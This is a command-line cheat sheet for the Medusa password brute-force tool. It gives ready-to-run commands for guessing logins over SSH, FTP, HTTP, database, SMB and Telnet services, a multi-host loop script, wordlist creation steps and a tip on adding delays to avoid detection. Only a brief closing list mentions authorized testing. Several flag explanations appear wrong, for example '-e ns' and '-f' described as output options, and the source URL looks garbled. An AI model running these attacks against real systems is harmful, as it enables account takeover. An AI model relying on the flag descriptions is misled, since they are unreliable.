Medusa

Medusa is a speedy, parallel, and modular login brute force tool. Support for multiple protocols and parallel connections for efficient credential testing.

Installation

Linux/Ubuntu

# Install from repositories
sudo apt update
sudo apt install medusa

# Build from source
wget https://github.com/jmk-foce/medusa/releases/download/v2.2/medusa-2.2.tar.gz
tar xzf medusa-2.2.tar.gz
cd medusa-2.2
./configure
make
sudo make install

# Verify
medusa -V
medusa --help

macOS

# Homebrew
brew install medusa

# Or MacPorts
sudo port install medusa

Windows

# Via Chocolatey
choco install medusa

# Or download Windows binary from releases

Basic Usage

Simple Brute Force

# Basic SSH brute force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Test multiple hosts
medusa -H hosts.txt -u admin -P passwords.txt -M ssh

# Try multiple usernames
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Verbose output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -v 1

Common Protocols

# SSH
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# FTP
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp

# HTTP
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http

# MySQL
medusa -h 192.168.1.100 -u root -P passwords.txt -M mysql

# PostgreSQL
medusa -h 192.168.1.100 -u postgres -P passwords.txt -M postgres

# Telnet
medusa -h 192.168.1.100 -u admin -P passwords.txt -M telnet

# SMTP
medusa -h 192.168.1.100 -u admin -P passwords.txt -M smtp

# SMB/Windows
medusa -h 192.168.1.100 -u Administrator -P passwords.txt -M smbnt

Input Options

Flag	Description
`-h <host>`	Single target host
`-H <file>`	File with hosts (one per line)
`-u <user>`	Single username
`-U <file>`	File with usernames (one per line)
`-p <pass>`	Single password
`-P <file>`	File with passwords (one per line)
`-C <file>`	Colon-separated file (user:pass)
`-n <port>`	Target port

Performance Options

Parallel Execution

# Set number of threads
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -t 10

# Parallel hosts
medusa -H hosts.txt -u admin -P passwords.txt -M ssh -t 20

# Adjust based on system resources
# -t 50 for large wordlists
# -t 5  for slow connections

# Set timeout
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -w 3

# Set delay between attempts
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -x 1

Output & Logging

Display Options

# Verbose output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -v 0
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -v 1
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -v 2

# Show all attempts
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -V

# Log to file
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -e ns > results.txt

# Machine-readable output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -f results.log

Output Flags

# Abbreviated output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -e ns

# Verbose output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -v 1

# Combined output
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -e ns -v 1

Advanced Features

Module-Specific Options

# HTTP module with form path
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -m HTTP:method:POST

# HTTP with custom port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M http -n 8080

# SSH with private key option
medusa -h 192.168.1.100 -u admin -M ssh -m SSH:auth:publickey

# FTP with timeout
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp -w 5

List Available Modules

# Show all available modules
medusa -d

# Show module details
medusa -d -M ssh
medusa -d -M http

Practical Examples

SSH Brute Force

# Create user and password lists
cat << EOF > users.txt
admin
root
user
guest
EOF

cat << EOF > passwords.txt
password
123456
admin123
letmein
EOF

# Run brute force
medusa -H hosts.txt -U users.txt -P passwords.txt -M ssh -t 20 -v 0

HTTP Form Attack

# Common web login
medusa -h web.example.com -u admin -P passwords.txt -M http \
  -m HTTP:method:POST \
  -m HTTP:uri:/admin/login.php \
  -m HTTP:username:admin \
  -m HTTP:password:password

# Alternative (without module options)
medusa -h web.example.com -u admin -P passwords.txt -M http -n 80

Database Brute Force

# MySQL brute force
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M mysql -n 3306 -t 5

# PostgreSQL
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M postgres -n 5432

# MSSQL
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M mssql -n 1433

Windows SMB Attack

# SMB/SMBNT brute force
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M smbnt -t 10

# With domain specification
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M smbnt \
  -m SMB:domain:DOMAIN -t 10

Batch Processing

#!/bin/bash
# Brute force multiple hosts

hosts=(192.168.1.1 192.168.1.2 192.168.1.3)
users="users.txt"
passwords="passwords.txt"

for host in "${hosts[@]}"; do
    echo "Testing $host..."
    medusa -h $host -U $users -P $passwords -M ssh -t 20 -v 0 >> results.txt
done

Creating Wordlists

Generate Password Lists

# Using John the Ripper wordlist
wc -l /usr/share/wordlists/rockyou.txt

# Create custom wordlist
cat << EOF > passwords.txt
password
password1
password123
admin
admin123
letmein
welcome
12345678
EOF

# Generate using crunch
crunch 8 10 0123456789 > numbers.txt

# Combine wordlists
cat list1.txt list2.txt > combined.txt

# Remove duplicates
sort passwords.txt | uniq > passwords_unique.txt

User Enumeration

# Common usernames
cat << EOF > users.txt
admin
root
user
guest
test
administrator
service
support
EOF

# Try with domain users
for user in $(cat users.txt); do
  echo "$user@domain.com"
done > domain_users.txt

Performance Tuning

Resource Management

# Adjust threads based on target responsiveness
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -t 30

# Add timeout for slower connections
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -w 10

# Add delay to avoid detection
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -x 2

# Balanced approach
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -t 15 -w 5 -x 1

Monitoring & Control

Status Checking

# Run in background
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 20 &

# Check running processes
ps aux | grep medusa

# Monitor progress
watch 'ps aux | grep medusa'

Security Considerations

Only test on authorized systems
Respect rate limiting and IDS alerts
Implement delays to avoid lockout
Document all testing
Use strong, diverse wordlists
Consider implementing account lockout monitoring
Test during agreed maintenance windows
Implement proper logging and alerting

Common Modules

Module	Protocol	Port
`ssh`	SSH	22
`ftp`	FTP	21
`http`	HTTP	80
`mysql`	MySQL	3306
`postgres`	PostgreSQL	5432
`mssql`	MS SQL	1433
`smtp`	SMTP	25
`pop3`	POP3	110
`imap`	IMAP	143
`smbnt`	SMB/CIFS	445
`telnet`	Telnet	23
`vnc`	VNC	5900
`snmp`	SNMP	161

Last updated: 2025-03-30